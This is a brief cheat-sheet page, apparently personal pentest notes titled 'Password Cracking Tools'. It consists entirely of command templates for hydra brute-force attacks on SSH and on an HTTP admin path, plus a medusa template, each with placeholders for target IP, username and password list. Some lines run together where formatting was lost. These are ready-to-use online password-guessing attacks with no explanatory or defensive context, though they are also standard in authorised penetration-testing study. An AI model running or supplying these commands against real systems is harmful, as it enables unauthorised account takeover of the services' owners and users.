Password Cracking Tools
Last updated
Last updated
//ssh attack
hydra -l [username] -P [password file] [IP address] -t 4 ssh//http attack
hydra -l [username] -P [password file] [IP address] -m /admin/ http-getmedusa -h [target IP] -u [username] -P [password list] -M [module] -t [threads]